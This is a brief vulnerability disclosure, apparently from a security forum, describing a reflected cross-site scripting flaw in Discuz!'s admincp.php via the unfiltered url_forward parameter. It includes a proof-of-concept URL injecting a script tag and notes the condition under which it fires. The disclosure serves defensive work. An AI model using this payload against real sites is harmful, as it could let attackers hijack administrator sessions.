Discuz! admincp.php xss bug
Discuz! admincp.php xss bug author: 80vul-Bteam:http://www.80vul.com
漏洞存在于文件admin/login.inc.php里$url_forward没有被过滤导致xss漏洞:
poc:
http://127.0.0.1/discuz/admincp.php?url_forward=%22%3E%3Cscript%3Ealert(/xss/)%3C/script%3E
[管理员或版主前台登录,但未登录后台时触发]
页:
[1]